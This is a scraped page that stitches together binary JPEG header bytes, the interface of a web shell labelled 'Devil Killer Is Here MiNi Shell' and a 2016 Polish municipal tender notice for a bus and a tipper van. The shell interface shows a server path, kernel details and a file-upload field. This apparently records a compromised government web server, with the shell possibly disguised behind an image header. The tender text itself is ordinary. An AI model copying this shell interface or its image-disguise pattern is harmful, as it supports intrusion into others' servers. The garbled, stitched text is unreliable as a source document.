JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161021/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161021/327970-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.biuletyn.net/nt-bin/start.asp?podmiot=zagnansk/&strona=Aktualno%C5%9Bci&typ=podmenu&typmenu=13&menu=15&podmenu=15&str=1' target='_blank'>http://www.biuletyn.net/nt-bin/start.asp?podmiot=zagnansk/&strona=Aktualno%C5%9Bci&typ=podmenu&typmenu=13&menu=15&podmenu=15&str=1</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 327970 - 2016
              z dnia 2016-10-21 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Zagnańsk:  Dostawę samochodów osobowych na potrzeby Urzędu Gminy w  Zagnańsk: 
ZADANIE 1  dostawa samochodu osobowego typu bus (1 szt.) 
ZADANE 2  dostawa samochodu osobowego  typu dostawczego (1 szt. )<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Zagnańsk, krajowy numer identyfikacyjny
              29101086600000, ul.
              ul. Spacerowa 
              8,
              26050  
              Zagnańsk, woj.
              świętokrzyskie, państwo
              Polska, tel.
              413 001 322, e-mail
              , faks
              413 001 373.
              <br />
              Adres strony internetowej (URL): www.zagnansk.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://www.biuletyn.net/nt-bin/start.asp?podmiot=zagnansk/&amp;strona=Aktualno%C5%9Bci&amp;typ=podmenu&amp;typmenu=13&amp;menu=15&amp;podmenu=15&amp;str=1</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://www.biuletyn.net/nt-bin/start.asp?podmiot=zagnansk/&amp;strona=Aktualno%C5%9Bci&amp;typ=podmenu&amp;typmenu=13&amp;menu=15&amp;podmenu=15&amp;str=1</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br /><br />
                Adres:
                <br />Urząd Gminy w  Zagnańsku , ul. Spacerowa 8,   26-050 Zagnańsk</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> Dostawę samochodów osobowych na potrzeby Urzędu Gminy w  Zagnańsk: 
ZADANIE 1  dostawa samochodu osobowego typu bus (1 szt.) 
ZADANE 2  dostawa samochodu osobowego  typu dostawczego (1 szt. )<br /><b>Numer referencyjny: </b>PZ.271.1.7.2016.PZZ<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b><br />2<br /><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />2<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1. Przedmiotem zamówienia jest dostawa samochodu osobowego typu Bus (Zadanie 1)
Wymagania techniczne:
1)	dopuszczalna masa całkowita max 3, 5 tony,
2)	preferowany kolor szary lub beżowy,
3)	silnik wysokoprężny z turbo doładowaniem o mocy minimalnej 146 KM 
4)	pojemność silnika minimalna 1900m3  2300 m3,
5)	zbiornik paliwa min. 80 litrów,
6)	rozstaw osi minimum 3600 mm (L2H2),
7)	napęd na koła przednie,
8)	skrzynia biegów 6-cio biegowa, manualna, 
9)	samochód musi spełniać wymogi normy emisji spalin Euro 6 tzn. dopuszczalne wartości
emisji zanieczyszczeń spalin,
10)	zamontowany hak holowniczy,
11)	komputer pokładowy,
12)	radio z nawigacją (dwa głośniki w kabinie kierowcy i dwa w przestrzeni pasażerskiej) 
i anteną niepodwyższającą wysokości pojazdu,
13)	regulowana kolumna kierownicy, wielofunkcyjna umożliwiająca obsługę radia i telefonu
 komórkowego, 
14)	trójpunktowe pasy bezpieczeństwa z napinaczami na wszystkich siedzeniach,
15)	fotel kierowcy z regulacją wysokości i podłokietnikiem, 
16)	obok fotela kierowcy  kanapa z 2 miejscami dla pasażera,
17)	3  osobowa kanapa w drugim rzędzie z 3 punktowymi pasami,
18)	3  osobowa kanapa w trzecim rzędzie z 3 punktowymi pasami,
19)	w tylnej części pojazdu za III rzędem foteli przestrzeń bagażowa o długości min. 1450 mm,
20)	systemy bezpieczeństwa: 
	elektroniczny system stabilizacji toru jazdy z asystentem hamowania  ESP 
	system zapobiegający blokowaniu kół podczas hamowania  ABS 
	system zapobiegający utracie przyczepności kół podczas przyspieszania  ASR 
21)	hamulce tarczowe z przodu i z tyłu,
22)	układ hamulcowy hydrauliczny, 
23)	niezależne zawieszenie przednie kół,
24)	tempomat,
25)	wspomaganie układu kierowniczego,
26)	lusterko wsteczne wewnątrz kabiny,
27)	poduszki powietrzne w kabinie kierowcy: przednie dla kierowcy i pasażera,
28)	nadwozie minimum 4-ro drzwiowe, w tym:
	drzwi boczne przesuwne z prawej strony,
	drzwi tylne otwierane, przeszklone, ogrzewane,
29)	tylne drzwi przeszklone otwierane pod kątem 180o,
30)	okno przesuwne w przestrzeni pasażerskiej z lewej strony,
31)	elektrycznie sterowane szyby w kabinie kierowcy,
32)	przyciemniane dodatkowo szyby w przestrzeni pasażerskiej,
33)	lusterka zewnętrzne elektrycznie ogrzewane i sterowane,
34)	autoalarm,
35)	immobiliser,
36)	centralny zamek z możliwością uruchamiania od wewnątrz sterowany pilotem, 
37)	dwa kluczyki,
38)	klimatyzacja manualna, z nawiewem na przód i tył samochodu,
39)	ogrzewanie przestrzeni pasażerskiej (drugi wymiennik ciepła),
40)	oświetlenie przestrzeni pasażerskiej,
41)	dywaniki podłogowe gumowe,
42)	fotele wyłożone tkaniną tekstylną,
43)	reflektory przeciwmgielne przednie,
44)	światła do jazdy dziennej włączane automatycznie,  
45)	dodatkowe tylne światło STOP,
46)	czujki cofania,
47)	dodatkowy komplet kół z oponami letnimi/zimowymi, 
48)	apteczka,
49)	trójkąt ostrzegawczy,
50)	gaśnica,
51)	pełnowymiarowe koło zapasowe (pod podłogą),

2  Przedmiotem zamówienia jest dostawa samochodu  osobowego typu dostawczego( Zadanie 2) 

Wymagania techniczne: 

1)	dopuszczalna masa całkowita max 3, 5 tony
2)	silnik diesel 4 - cylindrowy, rzędowy, 16 - zaworowy, 
3)	moc  min. 150 KM,
4)	pojemność silnika min. 3000 m3,
5)	zbiornik paliwa minimum 80l,
6)	samochód musi spełniać wymogi normy emisji spalin Euro 6 tzn. dopuszczalne wartości emisji zanieczyszczeń spalin,
7)	akumulator 12V  110 Ah
8)	alternator wzmocniony 150A,
9)	skrzynia biegów mechaniczna,
10)	podwozie dwuosiowe,
11)	układ jezdny 4 x 2 z napędem na tylną oś,
12)	nadwozie zabezpieczone antykorozyjnie,
13)	hamulce tarczowe z przodu i z tyłu, 
14)	systemy bezpieczeństwa: 
	elektroniczny system stabilizacji toru jazdy z asystentem hamowania  ESP 
	system zapobiegający blokowaniu kół podczas hamowania  ABS 
	 system zapobiegający utracie przyczepności kół podczas przyspieszania  ASR
	 układ umożliwiający zatrzymanie pojazdu na wzniesieniu,
15)	kabina 7 osobowa, 
16)	klimatyzacja automatyczna,
17)	konstrukcja ramowa,
18)	komputer pokładowy,
19)	poduszka powietrzna kierowcy,
20)	regulowana kolumna kierownicy,
21)	wspomaganie układu kierowniczego,
22)	regulowany fotel kierowcy,
23)	podwójny fotel pasażera ze schowkiem pod siedziskami,
24)	ławka dla 4 pasażerów ze schowkiem na całej długości pod siedziskiem,
25)	pokrowce na siedzenia wykonane z materiału odpornego na ścieranie oraz na zabrudzenia,
26)	zewnętrzne lusterka szerokokątne, elektrycznie sterowane i podgrzewane na długim ramieniu,
27)	elektrycznie sterowane szyby boczne w drzwiach przednich,
28)	okna w tylnej ścianie kabiny,
29)	belka świetlna LED ostrzegawcza montowana na kabinie z kloszami w kolorze żółtym w polu tekstowym napis naklejany od przodu GMINA ZAGNAŃSK, z tyłu herb gminy ZAGNAŃSK,
30)	zamontowany hak holowniczy kulowy oraz złącze elektryczne 13 PIN-DIN,
31)	osłona miski olejowej,
32)	blokada tylnego mostu,
33)	przednie zawieszenie z regulowanym drążkiem skrętnym umocowanym do podłużnicy ramy,
34)	wzmocnione tylne zawieszenie ( powyżej 10 piór na stronę),
35)	światła do jazdy dziennej włączane automatycznie,
36)	podgrzewany filtr paliwa,
37)	immobiliser fabryczny,
38)	centralny zamek ze zdalnym sterowaniem,
39)	radio CD, 
40)	koła pojedyncze na przedniej osi 195/75 R16C,
41)	koła podwójne na tylnej osi: 195/75 R16C,
42)	komplet opon zimowych 6 szt.,
43)	nadkola z tworzywa sztucznego,
44)	listwy boczne przeciwnajazdowe,
45)	pełnowymiarowe koło zapasowe,
46)	trójkąt ostrzegawczy, 
47)	apteczka, 
48)	gaśnica,
49)	klin pod koła,  
50)	skrzynka narzędziowa,
51)	długość zabudowy zewnętrznej minimum 3200 mm,
52)	szerokość zewnętrzna max. 2100 mm,
53)	podłoga z blachy stalowej, spawana,
54)	burty boczne aluminiowe min. 400 mm dwustronne, zamykane kasetowo, otwierane w osi dolnej,
55)	konstrukcja ramy pośredniej ze stali o podwyższonej wytrzymałości S235 spawana ocynkowana lub lakierowana wielowarstwowo RAL 7016,
56)	konstrukcja skrzyni wywrotu ze stali o podwyższonej wytrzymałości S235, spawana a następnie lakierowana wielowartwowo RAL 7016,
57)	burty stalowe lakierowane wielowarstwowo 7016,
58)	burta tylna otwierana w osi dolnej i górnej, samoczynnie otwierana podczas wywrotu,
59)	osłona kabiny i skrzyni narzędziowej z siatki stalowej ocynkowanej do wysokości kabiny,
60)	nadstawki  z siatki stalowej ocynkowane o wysokości równej z kabiną uchylane w osi górnej, demontowane,
61)	system wywrotu hydrauliczny, napęd pompy elektryczny POWERPACK,
62)	siłownik wywrotu o udźwigu 5T
63)	wywrot trzy stronny sterowany z kabiny kierowcy,
64)	oświetlenie zgodne z PRD I UE,
65)	dywaniki gumowe całosezonowe,

3 Inne Wymagania Zamawiającego dla Zadnia 1 i Zadania 2
3.1.W chwili dostawy samochody muszą  posiadać wykonany przegląd zerowy oraz gwarancją określoną  w książce gwarancyjnej.
3.2.Wymagany przez Zamawiającego okres gwarancji na dostarczone przedmioty zamówienia wynosi: 
	gwarancja mechaniczna bez limitu przebiegu kilometrów - nie mniej niż 2 lata,
	gwarancja na perforację nadwozia - nie mniej niż 6 lat (72 miesiące. )
3.3. Wykonawca w chwili odbioru przez Zamawiającego przedmiotu zamówienia, przekaże
         Zamawiającemu dokumenty związane z dopuszczeniem pojazdu do eksploatacji (kartę pojazdu
         wyciąg ze świadectwem homologacji, książkę gwarancji oraz fakturę zakupu).
3.4. Wykonawca zapewni
	przeszkolenie pracowników obsługi w zakresie eksploatacji pojazdu i BHP w warunkach praktycznego użytkowania pojazdu,
	zapewnienia serwis w odległości max. do 50 km od siedziby Zamawiającego.
	W przypadku wystąpienia awarii samochodu w okresie trwania gwarancji Wykonawca zobowiązany będzie do odebrania go z siedziby Zamawiającego, dokonania naprawy w stacji serwisowej autoryzowanej przez producenta samochodu, oraz do jego odstawienia do siedziby Zamawiającego po usunięciu awarii.
<br /><br /><b>II.5) Główny kod CPV: </b>34115200-8<br /><b> Dodatkowe kody CPV:</b>34130000-7<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 10/02/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie określa warunków udziału w postępowaniu w przedmiotowym zakresie. <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie określa warunków udziału w postępowaniu w przedmiotowym zakresie. <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający nie określa warunków udziału w postępowaniu w przedmiotowym zakresie. <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Zamawiający nie wymaga oświadczeń lub dokumentów w przedmiotowym zakresie.</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Zamawiający nie określa warunków udziału w przedmiotowym postępowaniu. Zamawiający nie wymaga oświadczeń lub dokumentów w przedmiotowym zakresie.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br />Nie dotyczy </div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">Zamawiający nie wymaga oświadczeń lub dokumentów w przedmiotowym zakresie.</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej lub należy wskazać dostępność tych dokumentów w formie elektronicznej pod wskazanym adresem internetowym. 
Pełnomocnictwo, o którym mowa w pkt 10.7 SIWZ ( jeżeli dotyczy).
Pełnomocnictwo ustanowione do reprezentowania wykonawców  wspólnie ubiegających się o udzielenie zamówienia publicznego( jeżeli dotyczy)  Pełnomocnictwo należy dołączyć w oryginale bądź kopii, potwierdzonej za zgodność z oryginałem notarialnie.
Oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust.1 pkt 23 przywołanej ustawy, tj. grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 o  ochronie konkurencji i konsumentów ( tj.: Dz.U. z 2015, poz. 184 z późn. zm.).
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
